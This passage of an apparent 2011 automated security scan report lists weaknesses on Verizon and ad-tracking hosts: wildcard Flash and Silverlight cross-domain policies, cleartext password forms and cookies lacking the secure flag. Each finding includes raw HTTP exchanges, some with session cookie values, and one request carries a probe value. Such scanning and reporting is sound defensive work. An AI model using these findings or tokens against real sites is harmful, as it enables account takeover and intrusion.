GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0x5008 20488
Set-Cookie: ts=1315260880; domain=.mathtag.com; path=/; expires=Tue, 04-Sep-2012 22:14:40 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.5. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 06 Sep 2011 22:14:38 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.6. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 05 Sep 2011 22:14:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 05 Sep 2011 22:14:37 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.7. http://s.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:31 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:30 GMT
Content-length: 202
Etag: "ca-4ceae16e"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.8. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 05 Sep 2011 22:14:39 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.9. http://servedby.flashtalking.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Mon, 05 Sep 2011 22:13:27 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 540

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:13:37 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.11. http://verizonwireless.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: verizonwireless.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Mon, 05 Sep 2011 22:14:33 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

3.12. http://cache.vzw.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.vzw.com

Response

HTTP/1.0 200 OK
Server: None
Content-Type: text/xml
Last-Modified: Fri, 10 Sep 2010 21:19:18 GMT
Content-Length: 786
ETag: "312-4c8aa0d6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vzwcorp.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.vzw.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizon.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizonwireless.com" secure="false" to-ports="*" />
...[SNIP]...

3.13. http://www.verizonwireless.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 05 Sep 2011 22:14:30 GMT
Content-type: text/xml
Last-modified: Tue, 14 Apr 2009 18:18:48 GMT
Content-length: 786
Etag: "312-49e4d388"
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.vzwcorp.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.vzw.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizon.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.verizonwireless.com" secure="false" to-ports="*" />
...[SNIP]...

3.14. http://www22.verizon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www22.verizon.com

Response

HTTP/1.0 200 OK
Content-Length: 324
Content-Type: text/xml
Content-Location: http://www22.verizon.com/crossdomain.xml
Last-Modified: Fri, 17 Apr 2009 15:53:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffffa54c16cd45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.tmpwebeng.com" secure="false"/>
<allow-access-from domain="*.verizon.com" secure="false"/>
...[SNIP]...

4. Silverlight cross-domain policy
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 06 Sep 2011 22:14:38 GMT
Content-Type: text/xml
Content-Length: 312
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

4.2. http://www22.verizon.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www22.verizon.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Jul 2011 08:25:59 GMT
Accept-Ranges: bytes
ETag: "80459cd17f47cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
identifier: 161
Content-Length: 342
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

5. Cleartext submission of password
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://cache.vzw.com/globalnav/globalnav.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /globalnav/globalnav.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /globalnav/globalnav.js?v=11-09 HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
Server: None
Content-Type: application/x-javascript
Last-Modified: Thu, 01 Sep 2011 01:18:08 GMT
ETag: "1331a-4e5edd50"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 78618
Date: Mon, 05 Sep 2011 22:14:30 GMT
Connection: close

/*******************************************************************************
Version 11.8.5 GlobalNav.js - js functions for creating the globalnav
*********************************************
...[SNIP]...
</div>';
           };

           div.innerHTML +=
               '<form id="signInForm" method="post" action="'+ this.loggedInURL +'" autocomplete="off">'+
       
               '<input type="hidden" name="goto" id="gotoID" value="'+ this.goTo +'"/>
...[SNIP]...
</label>'+
               '<input type="password" onfocus="inputSignIn(this,event)" onblur="inputSignIn(this,event)" autocomplete="off" maxlength="20" name="IDToken2" id="IDToken2_GN" value="" /><div class="clear15">
...[SNIP]...

5.2. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /webmail/servlet/HttpNimletDriver

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:55 GMT
Content-type: text/html
Expires: Wed, 31 Dec 1969 18:00:00 CST
Pragma: No-cache
Cache-control: no-cache
Content-Length: 21251


<html>

<head>
   <title>Verizon E-Mail</title>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l
gen true for "http://web.managedmail
...[SNIP]...
<table width="734" border="0" cellspacing="0" cellpadding="0">

<form name="loginForm" action="HttpNimletDriver" method="POST">
<input type="HIDDEN" name="nimlet" value="LoginNimlet" >
...[SNIP]...
<td colspan="2">
<input type="password" class="fixed" name="pwd" size="30" maxlength="50" /><br />
...[SNIP]...

5.3. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<div id="login-fields-return">
<FORM action="http://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post">
<div id="login-row">
...[SNIP]...
<br><input name="upwd" type="password" class="city" id="upwd"></div>
...[SNIP]...

6. SSL cookie without secure flag set
There are 59 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.verizonwireless.com
Path:   /amserver/saml2/jsp/idpSSOInit.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amserver/saml2/jsp/idpSSOInit.jsp HTTP/1.1
Host: login.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Identity Provider ID is null.
Server: VZW
Date: Mon, 05 Sep 2011 22:35:06 GMT
Connection: close
Cache-control: no-cache
Pragma: no-cache
Set-cookie: JSESSIONID=89A59939130D388D7849198CE10F65BE; Path=/amserver
Content-type: text/html
Content-length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<head>

...[SNIP]...

6.2. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8154
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/
Date: Mon, 05 Sep 2011 22:35:41 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

6.3. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16461
Expires: Mon, 05 Sep 2011 22:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:54 GMT
Connection: close
Set-Cookie: GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:54 GMT; path=/
Set-Cookie: HBXInitialVisit=Y; domain=.verizon.com; path=/

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...

6.4. https://adwords.google.com/um/StartNewLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 10
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:34:40 GMT
Expires: Mon, 05 Sep 2011 22:34:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

6.5. https://auth.verizon.com/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI "
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=null
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=06;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/


6.6. https://auth.verizon.net/amserver/UI/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://auth.verizon.net
Path:   /amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLoginnull
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=04;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/


6.7. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
